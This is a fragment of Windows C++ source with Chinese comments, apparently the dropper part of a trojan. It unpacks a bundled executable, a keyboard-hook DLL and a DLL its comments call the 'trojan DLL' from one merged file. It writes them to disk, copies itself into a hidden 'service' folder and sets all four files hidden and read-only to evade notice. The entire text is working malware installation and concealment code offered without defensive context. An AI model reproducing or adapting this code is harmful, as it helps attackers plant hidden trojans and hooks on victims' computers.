if (!ReadFile(hProg, &FileDis, sizeof(FILEDIS), &dwNumber, NULL))
{
return FALSE;
}
//检查文件是否合法
if (strncmp(FileDis.FileIdentifier, FILEIDENTIFIER, strlen(FILEIDENTIFIER)) != 0)
{
return 0;
}
//分配内存,申请数据缓冲区
cBufProg = new CHAR[FileDis.ProgSize + 1];
cBufHook = new CHAR[FileDis.HookDLLSize + 1];
cBufCock = new CHAR[FileDis.CockDLLSize + 1];
/************************************************************************************
// 创建目标文件路径
// INT iLen = strlen(DestFileDir);
// strncpy(ProgFilePath, DestFileDir, iLen);
// strncat(ProgFilePath, "\\", 1);
// strncat(ProgFilePath, FileDis.ProgName, strlen(FileDis.ProgName));
// strncpy(HookFilePath, DestFileDir, iLen);
// strncat(HookFilePath, "\\", 1);
// strncat(HookFilePath, FileDis.HookDLLName, strlen(FileDis.HookDLLName));
// strncpy(CockFilePath, DestFileDir, iLen);
// strncat(CockFilePath, "\\", 1);
// strncat(CockFilePath, FileDis.CockDLLName, strlen(FileDis.CockDLLName));
*************************************************************************************/
strcpy(ProgFilePath, DestFileDir);
strcat(ProgFilePath, "\\");
strcat(ProgFilePath, FileDis.ProgName);
strcpy(HookFilePath, DestFileDir);
strcat(HookFilePath, "\\");
strcat(HookFilePath, FileDis.HookDLLName);
strcpy(CockFilePath, DestFileDir);
strcat(CockFilePath, "\\");
strcat(CockFilePath, FileDis.CockDLLName);
//创建并打开EXE文件
hProgDest = CreateFile(ProgFilePath, GENERIC_WRITE, FILE_SHARE_READ, NULL, CREATE_NEW,
FILE_ATTRIBUTE_NORMAL, NULL);
if (hProgDest == INVALID_HANDLE_VALUE)
{
return FALSE;
}
//创建并打开钩子DLL文件
hHook = CreateFile(HookFilePath, GENERIC_WRITE, FILE_SHARE_READ, NULL, CREATE_NEW,
FILE_ATTRIBUTE_NORMAL, NULL);
if (hHook == INVALID_HANDLE_VALUE)
{
return FALSE;
}
//创建并打开木马DLL文件
hCock = CreateFile(CockFilePath, GENERIC_WRITE, FILE_SHARE_READ, NULL, CREATE_NEW,
FILE_ATTRIBUTE_NORMAL, NULL);
if (hCock == INVALID_HANDLE_VALUE)
{
return FALSE;
}
//文件指针移动到开始
if (SetFilePointer(hProg, 0, NULL, FILE_BEGIN) == 0xFFFFFFFF)
{
return FALSE;
}
//读取合并文件中的EXE文件体数据
if (!ReadFile(hProg, cBufProg, FileDis.ProgSize, &dwNumber, NULL))
{
return FALSE;
}
//读取合并文件中的钩子DLL文件体数据
if (!ReadFile(hProg, cBufHook, FileDis.HookDLLSize, &dwNumber, NULL))
{
return FALSE;
}
//读取合并文件中的木马DLL文件体数据
if (!ReadFile(hProg, cBufCock, FileDis.CockDLLSize, &dwNumber, NULL))
{
return FALSE;
}
//将EXE数据写入新创建的EXE文件
if (!WriteFile(hProgDest, cBufProg, FileDis.ProgSize, &dwNumber, NULL))
{
return FALSE;
}
//文件头写入EXE尾部
FileDis.IsFileReduced = 1; //文件已分解
if (!WriteFile(hProgDest, &FileDis, sizeof(FILEDIS), &dwNumber, NULL))
{
return FALSE;
}
//将DLL数据写入新创建的DLL文件
if (!WriteFile(hHook, cBufHook, FileDis.HookDLLSize, &dwNumber, NULL))
{
return FALSE;
}
if (!WriteFile(hCock, cBufCock, FileDis.CockDLLSize, &dwNumber, NULL))
{
return FALSE;
}
//拷贝自身代码
strncpy(TempFilePath, DestFileDir, strlen(DestFileDir));
strncat(TempFilePath, "\\service", 8);
CreateDirectory(TempFilePath, NULL);
//隐藏文件夹
SetFileAttributes(TempFilePath, FILE_ATTRIBUTE_HIDDEN);
strncat(TempFilePath, "\\", 1);
strncat(TempFilePath, ProgName, strlen(ProgName));
hTemp = CreateFile(TempFilePath, GENERIC_WRITE, FILE_SHARE_READ, NULL, CREATE_NEW,
FILE_ATTRIBUTE_NORMAL, NULL);
if (hTemp != INVALID_HANDLE_VALUE)
{
dwUnite = GetFileSize(hProg, NULL);
BufTemp = new CHAR[dwUnite + 1];
SetFilePointer(hProg, 0, NULL, FILE_BEGIN);
ReadFile(hProg, BufTemp, dwUnite, &dwNumber, NULL);
WriteFile(hTemp, BufTemp, dwUnite, &dwNumber, NULL);
}
//关闭文件指针
CloseHandle(hProg);
CloseHandle(hProgDest);
CloseHandle(hHook);
CloseHandle(hCock);
CloseHandle(hTemp);
//释放内存
delete[] cBufProg;
delete[] cBufHook;
delete[] cBufCock;
delete[] BufTemp;
//修改4个文件的属性为:隐藏、只读
SetFileAttributes(ProgFilePath, FILE_ATTRIBUTE_HIDDEN | FILE_ATTRIBUTE_READONLY);
SetFileAttributes(HookFilePath, FILE_ATTRIBUTE_HIDDEN | FILE_ATTRIBUTE_READONLY);
SetFileAttributes(CockFilePath, FILE_ATTRIBUTE_HIDDEN | FILE_ATTRIBUTE_READONLY);
SetFileAttributes(TempFilePath, FILE_ATTRIBUTE_HIDDEN | FILE_ATTRIBUTE_READONLY);
return TRUE;
}
